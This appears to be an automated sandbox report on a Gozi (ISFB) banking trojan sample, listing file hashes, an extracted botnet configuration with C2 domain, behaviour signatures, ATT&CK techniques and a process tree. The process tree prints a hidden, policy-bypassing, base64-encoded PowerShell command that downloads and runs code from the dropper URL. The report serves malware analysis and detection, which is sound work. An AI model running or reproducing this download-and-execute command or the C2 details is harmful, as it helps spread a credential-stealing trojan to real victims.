gozi | 54d0124f0b2197d0b7f6f87024d4e581c7b472eff9f87ecfa93b9a1603410e71

General

Target

client_5.hta
Size

22KB
MD5

988f8a03ac893e41d4f9aaca5addafe1
SHA1

d3bda7e7be11da19cd3adf16a4c58548eb573f74
SHA256

0389108b0322ecbbadd21a245c1b75f93e38a2e51a8b38a385596ebe05c323cf
SHA512

2dd80008e91d35da4d60572be008ab60ae7edd5ebe5b94518c3bfb3aa573c812e2abeb3c7d4033ca9cf5b99e64db5537c79b3e6aae8bd89e894de7fcc2a5b1c1
SSDEEP

384:pA7lUDQMeK43MV0p6WUuJOJjmF9Koq5nZN851z9fwP3jXMeSnqIc6l:H2MWqwRwPDd6l

Score

10^/10

gozi 5050 banker isfb trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://communicalink.com/index.php

Extracted

Family

gozi

Extracted

Family

gozi

Botnet

5050

C2

mifrutty.com

Attributes

base_path
/jerry/
build
250260
exe_type
loader
extension
.bob
server_id
50

rsa_pubkey.plain

aes.plain

Signatures

Gozi
Gozi is a well-known and widely distributed banking trojan.
banker trojan gozi

Blocklisted process makes network request 1 IoCs

flow	pid	Process
5	3056	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
2676	sXQmSAOc.exe

Loads dropped DLL 2 IoCs

pid	Process
3056	powershell.exe
3056	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
3056	powershell.exe
3056	powershell.exe
3056	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	3056	powershell.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 1656 wrote to memory of 2740	1656	mshta.exe	28
PID 1656 wrote to memory of 2740	1656	mshta.exe	28
PID 1656 wrote to memory of 2740	1656	mshta.exe	28
PID 1656 wrote to memory of 2740	1656	mshta.exe	28
PID 2740 wrote to memory of 3056	2740	cmd.exe	30
PID 2740 wrote to memory of 3056	2740	cmd.exe	30
PID 2740 wrote to memory of 3056	2740	cmd.exe	30
PID 2740 wrote to memory of 3056	2740	cmd.exe	30
PID 3056 wrote to memory of 2676	3056	powershell.exe	32
PID 3056 wrote to memory of 2676	3056	powershell.exe	32
PID 3056 wrote to memory of 2676	3056	powershell.exe	32
PID 3056 wrote to memory of 2676	3056	powershell.exe	32

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\client_5.hta"
1⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1656
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAG0AbQB1AG4AaQBjAGEAbABpAG4AawAuAGMAbwBtAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2740
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAG0AbQB1AG4AaQBjAGEAbABpAG4AawAuAGMAbwBtAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==
    3⤵
    - Blocklisted process makes network request
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3056
  - - C:\Users\Admin\AppData\Local\Temp\sXQmSAOc.exe
      "C:\Users\Admin\AppData\Local\Temp\sXQmSAOc.exe"
      4⤵
      Executes dropped EXE
      PID:2676

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\sXQmSAOc.exe

Filesize
292KB

MD5
f63d00d962c43095a6de3838401e5b59

SHA1
c49feab758326a965d30fef2807291cf39c0d61a

SHA256
713061a3f104a116e82686dcc3d7c28e6bac0ea519a166c43a65b2f10cd0bdcf

SHA512
12f2fa8d97edcc5e045d222bc0b74521767f13bc18d190a965b14095367e73fb24cd387e354f345675954f47fdd9e174ff8e257b32e7aaa04cd22b1b17cbd9d7

Download Submit
C:\Users\Admin\AppData\Local\Temp\sXQmSAOc.exe

Filesize
292KB

MD5
f63d00d962c43095a6de3838401e5b59

SHA1
c49feab758326a965d30fef2807291cf39c0d61a

SHA256
713061a3f104a116e82686dcc3d7c28e6bac0ea519a166c43a65b2f10cd0bdcf

SHA512
12f2fa8d97edcc5e045d222bc0b74521767f13bc18d190a965b14095367e73fb24cd387e354f345675954f47fdd9e174ff8e257b32e7aaa04cd22b1b17cbd9d7

Download Submit
\Users\Admin\AppData\Local\Temp\sXQmSAOc.exe

Filesize
292KB

MD5
f63d00d962c43095a6de3838401e5b59

SHA1
c49feab758326a965d30fef2807291cf39c0d61a

SHA256
713061a3f104a116e82686dcc3d7c28e6bac0ea519a166c43a65b2f10cd0bdcf

SHA512
12f2fa8d97edcc5e045d222bc0b74521767f13bc18d190a965b14095367e73fb24cd387e354f345675954f47fdd9e174ff8e257b32e7aaa04cd22b1b17cbd9d7

Download Submit
\Users\Admin\AppData\Local\Temp\sXQmSAOc.exe

Filesize
292KB

MD5
f63d00d962c43095a6de3838401e5b59

SHA1
c49feab758326a965d30fef2807291cf39c0d61a

SHA256
713061a3f104a116e82686dcc3d7c28e6bac0ea519a166c43a65b2f10cd0bdcf

SHA512
12f2fa8d97edcc5e045d222bc0b74521767f13bc18d190a965b14095367e73fb24cd387e354f345675954f47fdd9e174ff8e257b32e7aaa04cd22b1b17cbd9d7

Download Submit
memory/2676-20-0x0000000000220000-0x000000000022B000-memory.dmp

Filesize
44KB

Download
memory/2676-22-0x0000000000250000-0x000000000025D000-memory.dmp

Filesize
52KB

Download
memory/2676-27-0x0000000000220000-0x000000000022B000-memory.dmp

Filesize
44KB

Download
memory/2676-26-0x0000000000400000-0x000000000228F000-memory.dmp

Filesize
30.6MB

Download
memory/2676-25-0x0000000002370000-0x0000000002470000-memory.dmp

Filesize
1024KB

Download
memory/2676-21-0x0000000000400000-0x000000000228F000-memory.dmp

Filesize
30.6MB

Download
memory/2676-19-0x0000000002370000-0x0000000002470000-memory.dmp

Filesize
1024KB

Download
memory/3056-17-0x0000000074AE0000-0x000000007508B000-memory.dmp

Filesize
5.7MB

Download
memory/3056-2-0x0000000074AE0000-0x000000007508B000-memory.dmp

Filesize
5.7MB

Download
memory/3056-3-0x0000000074AE0000-0x000000007508B000-memory.dmp

Filesize
5.7MB

Download
memory/3056-7-0x0000000074AE0000-0x000000007508B000-memory.dmp

Filesize
5.7MB

Download
memory/3056-4-0x0000000002690000-0x00000000026D0000-memory.dmp

Filesize
256KB

Download
memory/3056-5-0x0000000002690000-0x00000000026D0000-memory.dmp

Filesize
256KB

Download
memory/3056-6-0x0000000074AE0000-0x000000007508B000-memory.dmp

Filesize
5.7MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads